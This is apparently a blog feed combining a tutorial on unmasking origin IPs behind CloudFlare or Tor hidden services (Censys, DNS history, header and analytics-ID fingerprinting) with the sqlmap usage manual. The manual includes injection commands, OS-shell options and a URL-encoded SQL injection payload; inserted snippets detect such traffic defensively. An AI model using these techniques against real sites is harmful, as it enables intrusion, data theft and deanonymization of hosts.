Suppose you host a controversial service at xyz123boot.com. Your origin server IP is 136.23.63.44. CloudFlare provides DDoS protection, a web application firewall and a few other services to protect your project from people who want it taken down. Your web server supports SSL and has a certificate, so the communication between CloudFlare and your server is encrypted just like the communication between your users and CloudFlare (i.e. not Flexible SSL). Everything else is only an illusion of security, but so far so good.

Note: CloudFlare's free SSL can be turned on in the CDN settings page. The default is Flexible SSL, meaning the connection from your users to CloudFlare is encrypted but the connection from CloudFlare to your server is not.

The problem is that when someone connects directly to your IP on port 443 (https://136.23.63.44:443), you expose the SSL certificate too. Scanning 0.0.0.0/0 (the whole internet) on port 443 for a certificate valid for xyz123boot.com hands the attacker your web server IP.

Censys is doing that scanning for you. All you have to do is turn the search just described in words into an actual search query.

Certificates for xyz123boot.com: parsed.names: xyz123boot.com
Only show valid ones: tags.raw: trusted

Combining several parameters on Censys is done with simple boolean logic. (https://www.censys.io/certificates/help)

Search entry: parsed.names: xyz123boot.com and tags.raw: trusted

Censys will show you all certificates found in its scans that match the criteria above.

Clicking through the search results one by one, you can open a dropdown with several tools by clicking "Explore" on the right.

Select What's using this certificate? > IPv4 Hosts.

You will see a list of IPv4 hosts using that particular certificate. One of them may be the origin IP.

You can verify via port 443 on the IP: does it redirect to xyz123boot.com? Does it show the website directly?
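As an added defender-side example that is not part of the original article: the exposure described in 1.1 exists because the origin answers anyone on port 443, so the origin's own access log shows who has already found it. The Python below runs that check over constructed log lines in common log format; the CDN prefixes are placeholders (the provider's real published list must be substituted) and every address and line is constructed.

```python
import ipaddress
import re

# Constructed placeholder prefixes standing in for the CDN's published
# egress ranges (CloudFlare publishes the real list; load that instead).
CDN_RANGES = [ipaddress.ip_network(n) for n in (
    "198.51.100.0/24",
    "203.0.113.0/24",
    "2001:db8:cd::/48",
)]

# Constructed origin access-log lines in common log format; 192.0.2.44 is
# a client that reached the origin without passing through the CDN.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Dec/2017:07:03:24 +0000] "GET / HTTP/1.1" 200 512
203.0.113.9 - - [10/Dec/2017:07:03:25 +0000] "GET /login HTTP/1.1" 200 1024
192.0.2.44 - - [10/Dec/2017:07:03:26 +0000] "GET / HTTP/1.1" 200 512
192.0.2.44 - - [10/Dec/2017:07:03:27 +0000] "GET /admin HTTP/1.1" 403 0
2001:db8:cd::5 - - [10/Dec/2017:07:03:28 +0000] "GET / HTTP/1.1" 200 512
this line is not a log record
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)


def is_cdn_address(ip):
    """True when ip falls inside one of the CDN prefixes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_RANGES)


def find_direct_hits(log_lines):
    """Return (ip, request, status) for each request that did not arrive via the CDN."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # unparseable line: skip, do not guess
        try:
            via_cdn = is_cdn_address(m["ip"])
        except ValueError:
            continue                     # first field is not an IP literal
        if not via_cdn:
            hits.append((m["ip"], m["req"], int(m["status"])))
    return hits


def count_by_source(hits):
    """Requests per bypassing source: one entry per address that knows the origin."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_direct_hits(SAMPLE_LOG.splitlines())
    for ip, n in count_by_source(hits).items():
        print(f"origin reached directly from {ip}: {n} request(s)")
```

Hits like these mean the origin address is already known outside the CDN; the fix on the origin side is to accept port 443 only from the CDN's ranges, so that the certificate is never served to anyone else.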

1.2 Using a given SSL certificate

Suppose you are the FBI and want to shut down a child pornography hidden service available at cheesecp5vaogohv.onion. To do that you need the origin IP, so you can contact the hosting provider and perhaps also follow the money to find the operator.

The hidden service has an SSL certificate. To find IPv4 hosts using the same certificate, just paste its SHA1 fingerprint (without colons) into the Censys IPv4 hosts search. Badly configured web servers are easy to find this way.

2. DNS records

After suffering many attacks you decide to start using CloudFlare. Data-driven services like Censys for DNS records may still have the old A record pointing to your web server's IP address.

The platform for this is SecurityTrails. Just type the site's domain name into the search field and press Enter. "Historical Data" is found in the left sidebar.

Besides old A records, even current DNS records can leak the origin server IP. The MX record, for example, is a common way to find the IP. If the site hosts its own mail server on the same server and IP, the origin server IP will be in the MX record.

Note: on A records: https://support.dnsimple.com/articles/a-record/

In short, an A record specifies the IP address corresponding to a host name or domain name; it is the essential record for name resolution.

3. HTTP headers

With data-driven platforms anyone can run powerful searches over huge amounts of data, and the origin server can even be found by comparing HTTP headers.

Especially when you have a very unique server header, carrying various software packages including sub-versions, finding you becomes easier.
This is not limited to a single parameter either. As described in 1.1, you can combine search parameters on Censys. The chance of being found this way grows with every uncommon header key or value you send.

Suppose you share your server HTTP header with 1500 other web servers that send the same header key and value combination. You also send a unique HTTP header from a new PHP framework, e.g. X-Generated-Via: XYZ Framework. About 400 webmasters currently use that framework in production. The intersection comes down to three servers. Doing this by hand takes seconds, and you have found the IP.

For example, the Censys search parameter for matching server headers is 80.http.get.headers.server:

Finding sites served by CloudFlare goes like this:

80.http.get.headers.server: cloudflare

4. Applications and services

A site using a TOR hidden service or served through CloudFlare is still an ordinary website. A quick test can reveal the IP too.

Headers like the HTTP Server header can be used to find possible vulnerabilities in the services and versions in use. Once you have access to the server you can obviously find the IP easily.

Another thing to try is finding edge cases that trigger errors. Error messages can reveal sensitive information. That information may be the IP itself, or anything that can serve as a parameter for the other methods described here. These attempts take creativity; they can be carried out during reconnaissance and combined.

Every test should run gobuster during the reconnaissance phase to find files and directories. What you may find are logs, database dumps/backups, and so on.

Also worth a try is finding out how the application can be made to interact with other services. If you're not the NSA and they are just using an API, you probably won't get the IP. But as an example, maybe you can set an avatar on the site by providing the image's URL instead of uploading it. If they download it, they probably do so from their origin server. Now the IP is in your logs.

This is only a quick overview. A large part of all the testing tricks you normally use can be applied, and webmasters can make many mistakes.

5. Content

If the origin server IP also returns the site's content, you have a large amount of data that is searchable on the web.

Browsing the site's source code, you need to look for unique code snippets. Third-party services with access/identifier keys used in JavaScript (e.g. Google Analytics, reCAPTCHA) are a good start.

Example Google Analytics tracking code taken from the HackTheBox website:

ga('create', 'UA-93577176-1', 'auto');

Filtering Censys data by body/source can be done with the parameter 80.http.get.body.

Unfortunately the normal search field has limitations. You can request research access on Censys so you can run more powerful queries through Google BigQuery.

Shodan is a service similar to Censys and also offers the http.html search parameter.

Example search:

https://www.shodan.io/search?query=http.html%3AUA-32023260-1

References

https://en.wikipedia.org/wiki/Tor_(anonymity_network)#Hidden_services
https://support.dnsimple.com/articles/a-record/
http://www.chinaz.com/web/2015/0121/379846.shtml
https://zhidao.baidu.com/question/1691539939903827828.html


The post Finding the real IP behind CloudFlare and the dark web (Tor) appeared first on 🔰雚苁ℒ🔰.


sqlmap usage manual (sqlmap usage, updated 22 August 2018)


sqlmap usage manual

Usage

Usage: python sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -d DIRECT           Connection string for direct database connection
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -x SITEMAPURL       Parse target(s) from remote sitemap(.xml) file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target URL

    --method=METHOD     Force usage of given HTTP method (e.g. PUT)
    --data=DATA         Data string to be sent through POST
    --param-del=PARA..  Character used for splitting parameter values
    --cookie=COOKIE     HTTP Cookie header value
    --cookie-del=COO..  Character used for splitting cookie values
    --load-cookies=L..  File containing cookies in Netscape/wget format
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --host=HOST         HTTP Host header value
    --referer=REFERER   HTTP Referer header value
    -H HEADER, --hea..  Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=AUTH..  HTTP authentication type (Basic, Digest, NTLM or PKI)
    --auth-cred=AUTH..  HTTP authentication credentials (name:password)
    --auth-file=AUTH..  HTTP authentication PEM cert/private key file
    --ignore-code=IG..  Ignore HTTP error code (e.g. 401)
    --ignore-proxy      Ignore system default proxy settings
    --ignore-redirects  Ignore redirection attempts
    --ignore-timeouts   Ignore connection timeouts
    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --safe-url=SAFEURL  URL address to visit frequently during testing
    --safe-post=SAFE..  POST data to send to a safe URL
    --safe-req=SAFER..  Load safe HTTP request from a file
    --safe-freq=SAFE..  Test requests between two visits to a given safe URL
    --skip-urlencode    Skip URL encoding of payload data
    --csrf-token=CSR..  Parameter used to hold anti-CSRF token
    --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
    --force-ssl         Force usage of SSL/HTTPS
    --hpp               Use HTTP parameter pollution method
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

  Optimization:
    These options can be used to optimize the performance of sqlmap

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --skip=SKIP         Skip testing for given parameter(s)
    --skip-static       Skip testing parameters that not appear to be dynamic
    --param-exclude=..  Regexp to exclude parameters from testing (e.g. "ses")
    --dbms=DBMS         Force back-end DBMS to this value
    --dbms-cred=DBMS..  DBMS authentication credentials (user:password)
    --os=OS             Force back-end DBMS operating system to this value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --invalid-string    Use random strings for invalidating values
    --no-cast           Turn off payload casting mechanism
    --no-escape         Turn off string escaping mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --not-string=NOT..  String to match when query is evaluated to False
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --union-from=UFROM  Table to use in FROM part of UNION query SQL injection
    --dns-domain=DNS..  Domain name used for DNS exfiltration attack
    --second-order=S..  Resulting page URL searched for second-order response

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --hostname          Retrieve DBMS server hostname
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    --comments          Retrieve DBMS comments
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
    -X EXCLUDECOL       DBMS database table column(s) to not enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --pivot-column=P..  Pivot column name
    --where=DUMPWHERE   Use WHERE condition while table dumping
    --start=LIMITSTART  First dump table entry to retrieve
    --stop=LIMITSTOP    Last dump table entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell
    --sql-file=SQLFILE  Execute SQL statements from given file(s)

  Brute force:
    These options can be used to run brute force checks

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management
    system underlying file system

    --file-read=RFILE   Read a file from the back-end DBMS file system
    --file-write=WFILE  Write a local file on the back-end DBMS file system
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters

    -s SESSIONFILE      Load session from a stored (.sqlite) file
    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behaviour
    --binary-fields=..  Result fields having binary values (e.g. "digest")
    --check-internet    Check Internet connection before assessing the target
    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL
    --crawl-exclude=..  Regexp to exclude pages from crawling (e.g. "logout")
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --charset=CHARSET   Blind SQL injection charset (e.g. "0123456789abcdef")
    --dump-format=DU..  Format of dumped data (CSV (default), HTML or SQLITE)
    --encoding=ENCOD..  Character encoding used for data retrieval (e.g. GBK)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target URL
    --fresh-queries     Ignore query results stored in session file
    --har=HARFILE       Log all HTTP traffic into a HAR file
    --hex               Use DBMS hex function(s) for data retrieval
    --output-dir=OUT..  Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --save=SAVECONFIG   Save options to a configuration INI file
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --test-filter=TE..  Select tests by payloads and/or titles (e.g. ROW)
    --test-skip=TEST..  Skip tests by payloads and/or titles (e.g. BENCHMARK)
    --update            Update sqlmap

  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --alert=ALERT       Run host OS command(s) when SQL injection is found
    --answers=ANSWERS   Set question answers (e.g. "quit=N,follow=N")
    --beep              Beep on question and/or when SQL injection is found
    --cleanup           Clean up the DBMS from sqlmap specific UDF and tables
    --dependencies      Check for missing (non-core) sqlmap dependencies
    --disable-coloring  Disable console output coloring
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --identify-waf      Make a thorough testing for a WAF/IPS/IDS protection
    --mobile            Imitate smartphone through HTTP User-Agent header
    --offline           Work in offline mode (only use session data)
    --purge-output      Safely remove all content from output directory
    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection
    --smart             Conduct thorough tests only if positive heuristic(s)
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --tmp-dir=TMPDIR    Local directory for storing temporary files
    --web-root=WEBROOT  Web server document root directory (e.g. "/var/www")
    --wizard            Simple wizard interface for beginner users

Output verbosity

Option: -v

This option can be used to set the verbosity level of output messages. There exist seven levels of verbosity. The default level is 1 in which information, warning, error, critical messages and Python tracebacks (if any occur) are displayed.

  • 0: Show only Python tracebacks, error and critical messages.
  • 1: Show also information and warning messages.
  • 2: Show also debug messages.
  • 3: Show also payloads injected.
  • 4: Show also HTTP requests.
  • 5: Show also HTTP responses’ headers.
  • 6: Show also HTTP responses’ page content.

A reasonable level of verbosity to further understand what sqlmap does under the hood is level 2, primarily for the detection phase and the take-over functionalities. If you want to see the SQL payloads the tool sends, level 3 is your best choice. This level is also recommended when you send the developers a potential bug report; make sure you send, along with the standard output, the traffic log file generated with option -t. In order to further debug potential bugs or unexpected behaviours, we recommend setting the verbosity to level 4 or above. Note that the verbosity can also be set with the shorter form of this option, where the number of letters v in the provided switch (instead of option) determines the verbosity level (e.g. -v instead of -v 2, -vv instead of -v 3, -vvv instead of -v 4, etc.).

Target

At least one of these options has to be provided to set the target(s).

Direct connection to the database

Option: -d

Run sqlmap against a single database instance. This option accepts a connection string in one of the following forms:

  • DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME (MySQL, Oracle, Microsoft SQL Server, PostgreSQL, etc.)
  • DBMS://DATABASE_FILEPATH (SQLite, Microsoft Access, Firebird, etc.)

For example:

$ python sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --bann\
er --dbs --users

Target URL

Option: -u or --url

Run sqlmap against a single target URL. This option requires a target URL in the following form:

http(s)://targeturl[:port]/[...]

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs -\
-users

Parse targets from Burp or WebScarab proxy logs

Option: -l

Rather than providing a single target URL, it is possible to test and inject against HTTP requests proxied through Burp proxy or WebScarab proxy. This option requires an argument which is the proxy’s HTTP requests log file.

Parse targets from remote sitemap(.xml) file

Option: -x

A sitemap is a file where web admins can list the web page locations of their site to tell search engines about the site content’s organization. You can provide a sitemap’s location to sqlmap by using option -x (e.g. -x http://www.target.com/sitemap.xml) so it could find usable target URLs for scanning purposes.

Scan multiple targets enlisted in a given textual file

Option: -m

Given a list of target URLs in a bulk file, sqlmap will scan each of them one by one.

Sample content of a bulk file provided as an argument to this option:

www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*

Load HTTP request from a file

Option: -r

sqlmap can load a raw HTTP request from a text file. That way you can skip a number of other options (e.g. setting of cookies, POSTed data, etc.).

Sample content of an HTTP request file provided as an argument to this option:

POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0

id=1

Note that if the request is over HTTPS, you can use this in conjunction with switch --force-ssl to force SSL connection to 443/tcp. Alternatively, you can append :443 to the end of the Host header value.
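The following Python snippet is an added example, not part of sqlmap: it parses a request file in the format shown above and builds the target URL, applying the rule just described (a :443 suffix on the Host value, or a force_ssl flag standing in for --force-ssl, selects HTTPS). The sample request is constructed to mirror the one above; how sqlmap itself parses the file internally is not reproduced here.

```python
"""Parse a raw HTTP request file of the kind sqlmap's -r option loads.

Added example, not part of sqlmap. It applies the documented rule that a
":443" suffix on the Host header (or --force-ssl) selects https; the exact
internal parsing done by sqlmap is an assumption here, not reproduced.
"""
from typing import Dict, Tuple

# Constructed sample; mirrors the request shown in the manual.
SAMPLE_REQUEST = (
    "POST /vuln.php HTTP/1.1\r\n"
    "Host: www.target.com\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "\r\n"
    "id=1"
)


def parse_raw_request(raw: str, force_ssl: bool = False) -> Tuple[str, str, Dict[str, str], str]:
    """Return (method, url, headers, body) for a raw HTTP/1.x request.

    Accepts both CRLF and bare LF line endings, since a file saved by hand
    or exported from a proxy may use either.
    """
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.split("\n")
    if not lines or not lines[0].strip():
        raise ValueError("empty request line")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError(f"malformed request line: {lines[0]!r}")
    method, path = parts[0].upper(), parts[1]

    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()

    host = headers.get("host")
    if host is None:
        raise ValueError("request has no Host header")

    # Documented rule: ":443" on the Host value (or --force-ssl) means HTTPS.
    scheme = "https" if (force_ssl or host.endswith(":443")) else "http"
    if host.endswith(":443"):
        host = host[: -len(":443")]  # default HTTPS port, drop it from the URL
    if path.startswith("http://") or path.startswith("https://"):
        url = path  # absolute-form request target (proxy style)
    else:
        url = f"{scheme}://{host}{path}"
    return method, url, headers, body


if __name__ == "__main__":
    print(parse_raw_request(SAMPLE_REQUEST))
```

The function raises on a missing Host header rather than guessing a host, because the request file is the only source of the target in this mode.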

Process Google dork results as target addresses

Option: -g

It is also possible to test and inject on GET parameters based on results of your Google dork.

This option makes sqlmap negotiate with the search engine its session cookie to be able to perform a search, then sqlmap retrieves Google's first 100 results for the Google dork expression with GET parameters, asking you if you want to test and inject on each possible affected URL.

For example:

$ python sqlmap.py -g "inurl:\".php?id=1\""

Load options from a configuration INI file

Option: -c

It is possible to pass user’s options from a configuration INI file, an example is sqlmap.conf.

Note that if you provide other options from command line, those are evaluated when running sqlmap and overwrite those provided in the configuration file.

Request

These options can be used to specify how to connect to the target URL.

HTTP method

Option: --method

sqlmap automatically detects the proper HTTP method to be used in HTTP requests. Nevertheless, in some cases it is required to force the usage of a specific HTTP method (e.g. PUT) that the automatic detection would not choose. This is possible with this option (e.g. --method=PUT).

HTTP data

Option: --data

By default the HTTP method used to perform HTTP requests is GET, but you can implicitly change it to POST by providing the data to be sent in the POST requests. Such data, i.e. those parameters, are tested for SQL injection as well as any provided GET parameters.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banne\
r --dbs --users

Parameter splitting character

Option: --param-del

There are cases when default parameter delimiter (e.g. & in GET and POST data) needs to be overwritten for sqlmap to be able to properly split and process each parameter separately.

For example:

$ python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=\
1" --param-del=";" -f --banner --dbs --users

HTTP Cookie header

Options and switch: --cookie, --cookie-del, --load-cookies and --drop-set-cookie

These options and switches can be used in two situations:

  • The web application requires authentication based upon cookies and you have such data.
  • You want to detect and exploit SQL injection on such header values.

In either case you need to send cookies with sqlmap requests; the steps to go through are the following:

  • Login to the application with your favourite browser.
  • Get the HTTP Cookie from the browser’s preferences or from the HTTP proxy screen and copy to the clipboard.
  • Go back to your shell and run sqlmap by pasting your clipboard as value of the option --cookie.

Note that the HTTP Cookie header values are usually separated by a ; character, not by an &. sqlmap can recognize these as separate sets of parameter=value too, as well as GET and POST parameters. In case that the separation character is other than ; it can be specified by using option --cookie-del.

If at any time during the communication the web application responds with Set-Cookie headers, sqlmap will automatically use its value in all further HTTP requests as the Cookie header. sqlmap will also automatically test those values for SQL injection. This can be avoided by providing the switch --drop-set-cookie – sqlmap will then ignore any incoming Set-Cookie header.

Vice versa, if you provide a HTTP Cookie header with option --cookie and the target URL sends an HTTP Set-Cookie header at any time, sqlmap will ask you which set of cookies to use for the following HTTP requests.

There is also an option --load-cookies which can be used to provide a special file containing Netscape/wget formatted cookies.

Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to 2 or above. Read below for details.

HTTP User-Agent header

Option and switch: --user-agent and --random-agent

By default sqlmap performs HTTP requests with the following User-Agent header value:

sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

However, it is possible to fake it with the option --user-agent by providing custom User-Agent as the option’s argument.

Moreover, by providing the switch --random-agent, sqlmap will randomly select a User-Agent from the ./txt/user-agents.txt textual file and use it for all HTTP requests within the session.

Some sites perform a server-side check of HTTP User-Agent header value and fail the HTTP response if a valid User-Agent is not provided, its value is not expected or is blacklisted by a web application firewall or similar intrusion prevention system. In this case sqlmap will show you a message as follows:

[hh:mm:20] [ERROR] the target URL responded with an unknown HTTP status code, try to 
force the HTTP User-Agent header with option --user-agent or --random-agent

Note that the HTTP User-Agent header is also tested against SQL injection if the --level is set to 3 or above. Read below for details.

HTTP Host header

Option: --host

You can manually set HTTP Host header value. By default HTTP Host header is parsed from a provided target URL.

Note that also the HTTP Host header is tested against SQL injection if the --level is set to 5. Read below for details.

HTTP Referer header

Option: --referer

It is possible to fake the HTTP Referer header value. By default no HTTP Referer header is sent in HTTP requests if not explicitly set.

Note that also the HTTP Referer header is tested against SQL injection if the --level is set to 3 or above. Read below for details.

Extra HTTP headers

Option: --headers

It is possible to provide extra HTTP headers by setting the option --headers. Each header must be separated by a newline and it is much easier to provide them from the configuration INI file. You can take a look at the sample sqlmap.conf file for such case.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" -z \
"ign,flu,bat,tec=E" --headers="Host:www.target.com\nUser-agent:Firefox 1.0" -v 5
[...]
[xx:xx:44] [TRAFFIC OUT] HTTP request [#5]:
GET /sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%209351%20FROM%28SELECT%20C\
OUNT%28%2A%29%2CCONCAT%280x3a6161733a%2C%28SELECT%20%28CASE%20WHEN%20%285473%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2\
0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\
20%20%20%20%20%20%20%20%20%20%20%205473%29%20THEN%201%20ELSE%200%20END%29%29%2C\
0x3a6c666d3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARA\
CTER_SETS%20GROUP%20BY%20x%29a%
29 HTTP/1.1
Host: www.target.com
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: Firefox 1.0
Connection: close
[...]
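From the defender's side, the default User-Agent shown in the "HTTP User-Agent header" section and the URL-encoded error-based probe in the captured request above are both usable as detection signals. The following Python script is an added example (not sqlmap code): it scans constructed access log lines in Combined Log Format, flags the default sqlmap/ User-Agent, and separately flags request URIs that, once URL-decoded, carry the COUNT(*), CONCAT(), FLOOR(RAND(0)*2), GROUP BY shape of that probe, since --user-agent and --random-agent make the first signal alone insufficient. The log lines, addresses and timestamps are constructed, not real traffic.

```python
"""Spot sqlmap activity in web server access logs.

Added, defender-side example; not part of sqlmap. Two independent signals
are checked, because the manual notes that --user-agent / --random-agent
replace the default User-Agent:

  1. the default "sqlmap/<version> (http://sqlmap.org)" User-Agent string;
  2. request-URI content that, once URL-decoded, has the error-based MySQL
     probe shape shown in the manual's captured request
     (SELECT COUNT(*),CONCAT(...FLOOR(RAND(0)*2)...) ... GROUP BY ...).
"""
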